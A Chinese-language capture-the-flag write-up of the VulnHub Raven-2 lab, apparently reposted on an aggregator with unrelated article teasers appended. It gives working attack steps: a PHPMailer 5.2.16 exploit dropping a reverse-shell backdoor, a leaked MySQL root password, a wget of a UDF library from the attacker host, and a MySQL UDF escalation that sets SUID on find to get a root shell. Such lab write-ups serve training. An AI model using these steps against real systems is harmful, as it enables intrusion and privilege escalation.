【OSCP-vulnhub】Raven-2

目录

端口扫描

本地/etc/hosts文件解析

目录扫描:

第一个flag

利用msf下载exp

flag2

flag3

Mysql登录

查看mysql的运行权限

MySql提权:UDF

查看数据库写入条件

查看插件目录

查看是否可以远程登录

gcc编译.o文件

创建so文件

创建临时监听

执行sql语句

创建数据表feng

插入数据文件

导出数据

创建自定义函数do_system

查询一下添加的函数

利用do_system给find命令赋予suid权限

find命令提权

The end(获取flag)

flag4{df2bc5e951d91581467bb9a2a8ff4425}

端口扫描

nmap -sS -p- 192.168.56.105 -sV -A --version-all -sC

图片

 

访问网站发现没什么可关注的点,点到blog的时候显示不可访问

图片

 

这个时候就联想到了

本地/etc/hosts文件解析

就能正常访问了。。

图片

 

目录扫描:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.56.105

图片

 

诶嘿,扫出了蛮多个目录的

在/vendor/PATH发现

第一个flag

图片

 

在readme发现很多关于PHPMailer的信息

图片

 

以及http://192.168.56.105/vendor/VERSION在这里面提示版本为5.2.16

我们随即便去查找一下相关的exp

利用msf下载exp

图片

 

修改代码

依次修改可以发送邮件的路径,要定义的后门文件/shell.php,要回连的地址以及端口,还有网站的后门文件保存路径

图片

 

python 40974.py

接着访问/contact.php触发后门文件再访问/shell.php就可以进行反弹shell。。。

图片

 

建立交互式终端

python -c 'import pty;pty.spawn("/bin/bash")'

查找flag

find / -name flag* 

找到两个有关flags的信息

  •  /var/www/flag2.txt

  •  /var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png

flag2

cat /var/www/flag2.txt

图片

 

flag3

图片

 

接着在wordpress目录发现数据库密码

图片

 

用户名:root,密码:R@v3nSecurity

Mysql登录

mysql -uroot -pR@v3nSecurity
mysql> show databases;

+--------------------+ | Database           | +--------------------+ | information_schema | | mysql              | | performance_schema | | wordpress          | +--------------------+

mysql> use wordpress
mysql> show tables;

+-----------------------+ | Tables_in_wordpress   | +-----------------------+ | wp_commentmeta        | | wp_comments           | | wp_links              | | wp_options            | | wp_postmeta           | | wp_posts              | | wp_term_relationships | | wp_term_taxonomy      | | wp_termmeta           | | wp_terms              | | wp_usermeta           | | wp_users              | +-----------------------+

select * from wp_users;

michael    | BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

steven     | B6X3H3ykawf2oHuPsbjQiih5iJXqad.

查看mysql的运行权限

是root权限在运行

ps -aux | grep mysql

MySql提权:UDF

查看数据库写入条件
show global variables like 'secure%';

+------------------+-------+ | Variable_name    | Value | +------------------+-------+ | secure_auth      | OFF   | | secure_file_priv |       | +------------------+-------+

  •  1)当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权

  •  2)当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/目录下,此时也无法提权

  •  3)当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权! 如果是 MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下文件夹下才能创建自定义函数。

查看插件目录
show variables like '%plugin%';

+---------------+------------------------+ | Variable_name | Value                  | +---------------+------------------------+ | plugin_dir    | /usr/lib/mysql/plugin/ | +---------------+------------------------+

查看是否可以远程登录
use mysql
select user,host from user;

+------------------+-----------+ | user             | host      | +------------------+-----------+ | root             | 127.0.0.1 | | root             | ::1       | | debian-sys-maint | localhost | | root             | localhost | | root             | raven     | +------------------+-----------+

发现root用户不允许远程登录,所以不能使用MSF提权

searchsploit udf

图片

 

gcc编译.o文件

gcc -g -c 1518.c
创建so文件
gcc -g -shared -Wl,-soname,exp.so -o exp.so 1518.o -lc
  •  -g 生成调试信息

  •  -c 编译(二进制)

  •  -shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。

  •  -Wl,-soname,exp.so

    • -Wl 表示将后续参数传递给链接器(ld)。

    • -soname,exp.so 设置动态库的 内部名称SONAME),影响动态链接时的库查找行为。

  •  -o:执行命令后的文件名

  •  -lc:-l 库 c库名

创建临时监听
python -m http.server 8080
wget http://192.168.56.103:8080/1518.so -O test.so
执行sql语句
use mysql;
创建数据表feng
create table feng(line blob);
插入数据文件
insert into feng values(load_file('/tmp/test.so'));
导出数据
  • outfile 多行导出,dumpfile一行导出

    select * from feng into dumpfile '/usr/lib/mysql/plugin/test.so';
    
创建自定义函数do_system

(或者sys_exec)类型是integer,别名(soname)文件名字

create function do_system returns integer soname 'test.so';
查询一下添加的函数
select * from mysql.func;
利用do_system给find命令赋予suid权限
select do_system('chmod u+s /usr/bin/find');
find命令提权

创建一个文件:touch feng

find / -name feng -exec "/bin/sh" \;

id uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

The end(获取flag)

cd /rootlscat flag4.txt  

flag4{df2bc5e951d91581467bb9a2a8ff4425}


好啦,本文的内容就到这了,希望对你有所帮助。。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/80208.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Podman Desktop:现代轻量容器管理利器(Podman与Docker)

前言 什么是 Podman Desktop? Podman Desktop 是基于 Podman CLI 的图形化开源容器管理工具,运行在 Windows(或 macOS)上,默认集成 Fedora Linux(WSL 2 环境)。它提供与 Docker 类似的使用体验…

极狐GitLab 权限和角色如何设置?

极狐GitLab 是 GitLab 在中国的发行版,关于中文参考文档和资料有: 极狐GitLab 中文文档极狐GitLab 中文论坛极狐GitLab 官网 权限和角色 (BASIC ALL) 将用户添加到项目或群组时,您可以为他们分配角色。该角色决定他们在极狐GitLab 中可以执…

解锁现代生活健康密码,开启养生新方式

在科技飞速发展的当下,我们享受着便捷生活,却也面临诸多健康隐患。想要维持良好状态,不妨从这些细节入手,解锁科学养生之道。​ 肠道是人体重要的消化器官,也是最大的免疫器官,养护肠道至关重要。日常可多…

Kafka 主题设计与数据接入机制

一、前言:万物皆流,Kafka 是入口 在构建实时数仓时,Kafka 既是 数据流动的起点,也是后续流处理系统(如 Flink)赖以为生的数据源。 但“消息进来了” ≠ “你就能处理好了”——不合理的 Topic 设计、接入方…

【绘制图像轮廓|凸包特征检测】图像处理(OpenCV) -part7

15 绘制图像轮廓 15.1 什么是轮廓 轮廓是一系列相连的点组成的曲线,代表了物体的基本外形。相对于边缘,轮廓是连续的,边缘不一定连续,如下图所示。轮廓是一个闭合的、封闭的形状。 轮廓的作用: 形状分析 目标识别 …

uniapp中使用<cover-view>标签

文章背景&#xff1a; uniapp中遇到了原生组件(canvas)优先级过高覆盖vant组件 解决办法&#xff1a; 使用<cover-view>标签 踩坑&#xff1a; 我想实现的是一个vant组件库中动作面板的效果&#xff0c;能够从底部弹出框&#xff0c;让用户进行选择&#xff0c;我直…

Kafka常见问题及解决方案

Kafka 是一个强大的分布式流处理平台&#xff0c;广泛用于高吞吐量的数据流处理&#xff0c;但在实际使用过程中&#xff0c;也会遇到一些常见问题。以下是一些常见的 Kafka 问题及其对应的解决办法的详细解答&#xff1a; 消息丢失 一、原因 1.生产端 网络故障、生产者超时…

leetcode 二分查找应用

34. Find First and Last Position of Element in Sorted Array 代码&#xff1a; class Solution { public:vector<int> searchRange(vector<int>& nums, int target) {int low lowwer_bound(nums,target);int high upper_bound(nums,target);if(low high…

【Docker】在容器中使用 NVIDIA GPU

解决容器 GPU 设备映射问题&#xff0c;实现 AI 应用加速 &#x1f517; 官方文档&#xff1a;NVIDIA Container Toolkit GitHub 常见错误排查 若在运行测试容器时遇到以下错误&#xff1a; docker: Error response from daemon: could not select device driver ""…

通过Quartus II实现Nios II编程

目录 一、认识Nios II二、使用Quartus II 18.0Lite搭建Nios II硬件部分三、软件部分四、运行项目 一、认识Nios II Nios II软核处理器简介 Nios II是Altera公司推出的一款32位RISC嵌入式处理器&#xff0c;专门设计用于在FPGA上运行。作为软核处理器&#xff0c;Nios II可以通…

JAVA设计模式——(三)桥接模式

JAVA设计模式——&#xff08;三&#xff09;桥接模式&#xff08;Bridge Pattern&#xff09; 介绍理解实现武器抽象类武器实现类涂装颜色的行为接口具体颜色的行为实现让行为影响武器修改武器抽象类修改实现类 测试 适用性 介绍 将抽象和实现解耦&#xff0c;使两者可以独立…

k8s 证书相关问题

1.重新生成新证书 kubeadm init phase certs apiserver-etcd-client --config ~/kubeadm.yaml这个命令表示生成 kube-apiserver 连接 etcd 使用的证书,生成后如下 -rw------- 1 root root 1.7K Apr 23 16:35 apiserver-etcd-client.key -rw-r--r-- 1 root root 1.2K Apr 23 …

比较:AWS VPC peering与 AWS Transit Gateway

简述: VPC 对等连接和 Transit Gateway 用于连接多个 VPC。VPC 对等连接提供全网状架构,而 Transit Gateway 提供中心辐射型架构。Transit Gateway 提供大规模 VPC 连接,并简化了 VPC 间通信管理,相比 VPC 对等连接,支持大量 VPC 的 VPC 间通信管理。 VPC 对等连接 AWS V…

制造企业PLM深度应用:2025年基于PDCA循环的7项持续改进指标

制造企业的产品生命周期管理&#xff08;PLM&#xff09;在数字化转型的浪潮中扮演着至关重要的角色。PLM深度应用不仅能够提升产品研发效率、保证产品质量&#xff0c;还能增强企业在市场中的竞争力。随着2025年智能制造目标的推进&#xff0c;基于PDCA循环的持续改进对于PLM的…

极狐GitLab 的压缩和合并是什么?

极狐GitLab 是 GitLab 在中国的发行版&#xff0c;关于中文参考文档和资料有&#xff1a; 极狐GitLab 中文文档极狐GitLab 中文论坛极狐GitLab 官网 压缩和合并 (BASIC ALL) 在你处理一个特性分支时&#xff0c;通常会创建一些小的、独立的提交。这些小提交帮助描述构建特性…

解耦旧系统的利器:Java 中的适配器模式(Adapter Pattern)实战解析

在现代软件开发中&#xff0c;我们经常需要与旧系统、第三方库或不一致接口打交道。这时候&#xff0c;如果能优雅地整合这些不兼容组件&#xff0c;又不破坏原有结构&#xff0c;就需要一位“翻译官” —— 适配器模式。本文将通过 Java 实例&#xff0c;详细讲解适配器模式的…

03-谷粒商城笔记

一个插件的install和生命周期的报错是不一样的 Maven找不到ojdbc6和sqljdbc4依赖包 这时候我找到了jar包&#xff0c;然后我就先找到一个jar安装到了本地仓库。 在终端上进行命令了&#xff1a; mvn install:install-file -DfileD:\ojdbc6-11.2.0.4.jar -DgroupIdcom.oracle …

黑马点评redis改 part 5

达人探店 发布探店笔记 那第一张表block表它里边的结构呢是这个 首先呢第一个字段是i d&#xff0c;就是主键&#xff0c;第二个呢是shop id&#xff0c;就是商户你发的这个比例啊&#xff0c;它是跟哪个商户有关系的。第三个呢用户id就是谁发的这篇笔记&#xff0c;第四个呢标…

【PCB工艺】运放电路中的负反馈机制

通过运算方法器电路设计详细解释负反馈机制&#xff08;Negative Feedback&#xff09; 负反馈 是控制系统、电子电路、神经系统等多个领域中非常核心的概念。特别在运算放大器&#xff08;Op-Amp&#xff09;电路中&#xff0c;负反馈是实现精确控制和高稳定性的关键机制。 …

声纹振动传感器在电力监测领域的应用

声纹振动传感器在电力监测领域有多种应用&#xff0c;主要包括以下几个方面&#xff1a; 变压器监测 故障诊断&#xff1a;变压器在运行过程中会产生特定的声纹和振动信号&#xff0c;当变压器内部出现故障&#xff0c;如绕组短路、铁芯松动、局部放电等&#xff0c;其声纹和振…